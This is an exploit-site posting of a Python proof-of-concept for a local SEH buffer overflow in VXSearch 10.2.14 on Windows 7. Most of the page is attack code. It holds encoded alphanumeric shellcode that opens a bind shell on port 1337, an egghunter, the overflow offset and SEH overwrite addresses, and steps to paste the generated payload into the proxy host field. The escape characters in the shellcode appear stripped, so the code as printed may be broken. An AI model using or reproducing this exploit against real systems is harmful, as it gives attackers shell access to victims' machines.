Home / exploits VXSearch 10.2.14 Local SEH Overflow
Posted on 17 November 2017
#!/usr/bin/env python # # Exploit Title : VXSearch v10.2.14 Local SEH Overflow # Date : 11/16/2017 # Exploit Author : wetw0rk # Vendor Homepage : http://www.flexense.com/ # Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe # Version : 10.2.14 # Tested on : Windows 7 (x86) # Description : VX Search v10.2.14 suffers from a local buffer overflow. The # following exploit will generate a bind shell on port 1337. I # was unable to get a shell working with msfvenom shellcode so # below is a custom alphanumeric bind shell. Greetz rezkon ;) # # trigger the vulnerability by : # Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name # import struct shellcode = "w00tw00t" shellcode += ( "x25x4ax4dx4ex55" # and eax, 0x554e4d4a "x25x35x32x31x2a" # and eax, 0x2a313235 "x2dx6ax35x35x35" # sub eax, 0x3535356a "x2dx65x6ax6ax65" # sub eax, 0x656a6a65 "x2dx61x64x4dx65" # sub eax, 0x654d6461 "x50" # push eax "x5c" # pop esp ) shellcode += ( "x25x4ax4dx4ex55x25x35x32x31x2ax2dx4fx4fx4fx4f" "x2dx4fx30x4fx68x2dx62x2dx62x72x50x25x4ax4dx4e" "x55x25x35x32x31x2ax2dx76x57x57x63x2dx77x36x39" "x32x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx41x54" "x54x54x2dx25x54x7ax2dx2dx25x52x76x36x50x25x4a" "x4dx4ex55x25x35x32x31x2ax2dx49x35x49x49x2dx49" "x25x49x69x2dx64x25x72x6cx50x25x4ax4dx4ex55x25" "x35x32x31x2ax2dx70x33x33x25x2dx70x25x70x25x2d" "x4bx6ax56x39x50x25x4ax4dx4ex55x25x35x32x31x2a" "x2dx79x55x75x32x2dx79x75x75x55x2dx79x77x77x78" "x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx25x4ax4a" "x25x2dx39x5fx4dx34x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx4bx57x4bx57x2dx70x76x4bx79x2dx70x76" "x78x79x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx49" "x49x49x49x2dx49x4ex64x49x2dx78x25x78x25x2dx6f" "x25x7ax48x50x25x4ax4dx4ex55x25x35x32x31x2ax2d" "x58x58x38x58x2dx58x30x32x58x2dx51x46x2dx47x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx5fx52x5fx5f" "x2dx5fx25x25x35x2dx62x39x25x25x50x25x4ax4dx4e" "x55x25x35x32x31x2ax2dx4ax4ax4ax4ax2dx4ax4ax4a" "x4ax2dx79x39x4ax79x2dx6dx32x4bx68x50x25x4ax4d" "x4ex55x25x35x32x31x2ax2dx30x30x71x30x2dx30x25" "x71x30x2dx38x31x51x5fx50x25x4ax4dx4ex55x25x35" "x32x31x2ax2dx32x32x32x32x2dx78x77x7ax77x50x25" "x4ax4dx4ex55x25x35x32x31x2ax2dx62x62x62x62x2d" "x48x57x47x4fx50x25x4ax4dx4ex55x25x35x32x31x2a" "x2dx76x76x4fx4fx2dx36x39x5ax5ax50x25x4ax4dx4e" "x55x25x35x32x31x2ax2dx61x61x61x61x2dx4ax61x4a" "x25x2dx45x77x53x35x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx63x63x63x63x2dx39x63x63x2dx2dx32x63" "x7ax25x2dx31x49x7ax25x50x25x4ax4dx4ex55x25x35" "x32x31x2ax2dx72x79x79x79x2dx25x30x25x30x2dx25" "x32x25x55x50x25x4ax4dx4ex55x25x35x32x31x2ax2d" "x58x58x41x58x2dx58x58x25x77x2dx6ex51x32x69x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx48x77x38x48" "x2dx4ex76x6ex61x50x25x4ax4dx4ex55x25x35x32x31" "x2ax2dx41x41x6ex6ex2dx31x31x30x6ex2dx37x36x30" "x2dx50x25x4ax4dx4ex55x25x35x32x31x2ax2dx38x38" "x38x38x2dx38x79x38x25x2dx38x79x38x25x2dx58x4c" "x73x25x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx61" "x52x61x52x2dx37x4ax31x49x50x25x4ax4dx4ex55x25" "x35x32x31x2ax2dx4dx47x4dx4dx2dx30x25x4dx6bx2d" "x36x32x66x71x50x25x4ax4dx4ex55x25x35x32x31x2a" "x2dx36x43x43x6cx2dx33x54x47x25x50x25x4ax4dx4e" "x55x25x35x32x31x2ax2dx4cx4cx4cx4cx2dx6ex4cx6e" "x36x2dx65x67x6fx25x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx25x25x4bx4bx2dx25x25x6fx4bx2dx4ex41" "x59x2dx50x25x4ax4dx4ex55x25x35x32x31x2ax2dx41" "x41x41x41x2dx52x52x78x41x2dx6ex6cx70x25x50x25" "x4ax4dx4ex55x25x35x32x31x2ax2dx30x6cx30x30x2d" "x30x6cx6cx30x2dx38x70x79x66x50x25x4ax4dx4ex55" "x25x35x32x31x2ax2dx42x70x70x45x2dx32x45x70x31" "x2dx25x4bx49x31x50x25x4ax4dx4ex55x25x35x32x31" "x2ax2dx25x50x50x50x2dx25x7ax72x25x2dx4ex73x61" "x52x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx35x77" "x74x74x2dx61x78x35x34x50x25x4ax4dx4ex55x25x35" "x32x31x2ax2dx30x30x30x30x2dx30x30x59x30x2dx30" "x30x74x51x2dx6bx36x79x67x50x25x4ax4dx4ex55x25" "x35x32x31x2ax2dx75x38x43x43x2dx7ax31x43x43x2d" "x7ax2dx77x79x50x25x4ax4dx4ex55x25x35x32x31x2a" "x2dx59x59x59x59x2dx59x59x59x59x2dx6fx6cx4dx77" "x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx45x45x45" "x45x2dx34x2dx76x45x2dx37x25x5ax65x50x25x4ax4d" "x4ex55x25x35x32x31x2ax2dx34x34x34x34x2dx62x34" "x34x34x2dx6dx56x47x57x50x25x4ax4dx4ex55x25x35" "x32x31x2ax2dx2dx2dx2dx2dx2dx76x2dx2dx76x2dx55" "x4cx55x7ax50x25x4ax4dx4ex55x25x35x32x31x2ax2d" "x77x77x77x30x2dx47x47x79x30x2dx42x42x39x34x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx56x75x36x51" "x2dx42x61x49x43x50x25x4ax4dx4ex55x25x35x32x31" "x2ax2dx56x56x31x56x2dx31x79x31x25x2dx50x6cx48" "x34x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx72x72" "x72x72x2dx72x25x38x38x2dx38x25x25x25x2dx54x41" "x30x30x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx47" "x47x47x76x2dx47x47x76x76x2dx6bx72x6cx5ax50x25" "x4ax4dx4ex55x25x35x32x31x2ax2dx25x71x25x71x2d" "x73x42x63x68x50x25x4ax4dx4ex55x25x35x32x31x2a" "x2dx48x55x51x51x2dx45x78x4fx5ax50x25x4ax4dx4e" "x55x25x35x32x31x2ax2dx45x45x45x32x2dx45x45x25" "x31x2dx76x75x2dx25x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx6ex4fx6dx6ex2dx35x48x5fx5fx50x25x4a" "x4dx4ex55x25x35x32x31x2ax2dx2dx2dx2dx2dx2dx71" "x2dx2dx71x2dx71x2dx4ax71x2dx66x65x70x62x50x25" "x4ax4dx4ex55x25x35x32x31x2ax2dx56x30x56x30x2d" "x56x38x25x30x2dx74x37x25x45x50x25x4ax4dx4ex55" "x25x35x32x31x2ax2dx32x32x32x77x2dx32x32x32x32" "x2dx43x41x4ax57x50x25x4ax4dx4ex55x25x35x32x31" "x2ax2dx63x63x63x30x2dx79x41x41x6ex50x25x4ax4d" "x4ex55x25x35x32x31x2ax2dx4bx4bx4bx4bx2dx4bx4b" "x25x31x2dx4bx71x25x32x2dx4fx6ex25x2dx50x25x4a" "x4dx4ex55x25x35x32x31x2ax2dx37x37x37x37x2dx6d" "x37x6dx37x2dx6dx37x6dx37x2dx64x55x63x58x50x25" "x4ax4dx4ex55x25x35x32x31x2ax2dx44x6cx6cx6cx2d" "x34x44x44x6cx2dx30x33x4ex54x50x25x4ax4dx4ex55" "x25x35x32x31x2ax2dx2dx7ax43x2dx2dx48x79x71x47" "x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx41x41x41" "x41x2dx41x46x71x25x2dx5ax77x7ax32x50x25x4ax4d" "x4ex55x25x35x32x31x2ax2dx47x47x47x47x2dx47x6e" "x47x6ex2dx47x78x6ex78x2dx47x79x77x79x50x25x4a" "x4dx4ex55x25x35x32x31x2ax2dx74x38x69x38x2dx51" "x4ax72x52x50x25x4ax4dx4ex55x25x35x32x31x2ax2d" "x79x79x30x79x2dx4dx4dx2dx4dx2dx44x35x25x41x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx6fx6fx6fx31" "x2dx74x25x6fx33x2dx56x32x41x25x50x25x4ax4dx4e" "x55x25x35x32x31x2ax2dx54x54x54x54x2dx72x72x54" "x54x2dx79x69x49x56x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx70x70x70x70x2dx70x25x5ax70x2dx4ax38" "x36x72x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx6d" "x6dx6dx6dx2dx6dx6dx6dx46x2dx48x76x74x25x2dx53" "x7ax25x25x50x25x4ax4dx4ex55x25x35x32x31x2ax2d" "x7ax7ax7ax43x2dx49x43x25x43x2dx25x5fx25x30x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx51x51x51x51" "x2dx51x51x51x70x2dx38x51x61x7ax2dx25x39x70x7a" "x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx37x44x37" "x6cx2dx78x30x6fx73x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx44x25x25x44x2dx76x25x76x76x2dx63x6c" "x63x74x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx42" "x47x74x4ex2dx33x6cx7ax39x50x25x4ax4dx4ex55x25" "x35x32x31x2ax2dx7ax30x66x7ax2dx76x44x4fx49x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx41x41x41x41" "x2dx6dx67x33x6cx50x25x4ax4dx4ex55x25x35x32x31" "x2ax2dx51x51x51x51x2dx65x71x51x51x2dx49x76x7a" "x6ax50x25x4ax4dx4ex55x25x35x32x31x2ax2dx35x4a" "x42x35x2dx35x7ax7ax42x2dx76x7ax73x7ax50x25x4a" "x4dx4ex55x25x35x32x31x2ax2dx35x25x35x35x2dx35" "x25x76x35x2dx35x39x52x69x50x25x4ax4dx4ex55x25" "x35x32x31x2ax2dx74x74x74x5ax2dx36x5ax74x30x2d" "x25x32x6ax38x50x25x4ax4dx4ex55x25x35x32x31x2a" "x2dx75x75x43x75x2dx43x6fx41x30x2dx39x64x30x34" "x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx74x2dx58" "x6ex2dx78x47x35x69x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx66x79x4fx66x2dx48x7ax25x47x50x25x4a" "x4dx4ex55x25x35x32x31x2ax2dx42x42x7ax42x2dx33" "x6dx55x32x50x25x4ax4dx4ex55x25x35x32x31x2ax2d" "x61x61x61x41x2dx61x39x64x25x2dx59x33x7ax34x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx66x66x66x66" "x2dx41x41x66x66x2dx25x33x66x66x2dx34x25x6dx43" "x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx49x49x32" "x49x2dx49x59x25x49x2dx72x74x25x6dx50" ) shellcode += "A" * 4000 egghunter = "A" * 40 # serve as NOP's egghunter += ( "x25x4ax4dx4ex55" # and eax, 0x554e4d4a "x25x35x32x31x2a" # and eax, 0x2a313235 "x2dx58x58x58x58" # sub eax, 0x58585858 "x2dx58x58x67x58" # sub eax, 0x58675858 "x2dx5ax4fx2dx4f" # sub eax, 0x4f2d4f5a "x50" # push eax "x5c" # pop esp ) egghunter += ( "%JMNU%521*-%OOO-%OOO-AzayP%JMNU%521*-r-Pr-" "r%Pr-m7ukP%JMNU%521*-wwww-wwwA-wwA--k%FBP%" "JMNU%521*-Jk1J-Tk1T-sp%1P%JMNU%521*-WWM6-6" "W30-7L%%P%JMNU%521*-WNWW-W%d%-P4wTP%JMNU%5" "21*-wt7G-zIvNP%JMNU%521*-1%uu-1%u1-84KYP" ) offset = "A" * (23920-len(shellcode)) # offset to nSEH nSEH = "x74x26x75x26" # JE/JNZ + 38 (decimal) SEH = struct.pack('<L', 0x65263067) # POP,POP,RET (QtGui4.dll [asciiprint]) trigger = "A" * (40000 - ( len(offset) + len(nSEH) + len(SEH) + len(egghunter) + len(shellcode) ) ) payload = offset + shellcode + nSEH + SEH + egghunter + trigger print "[*] payload written to pasteme.txt" fd = open("pasteme.txt", 'w') fd.write(payload) fd.close()
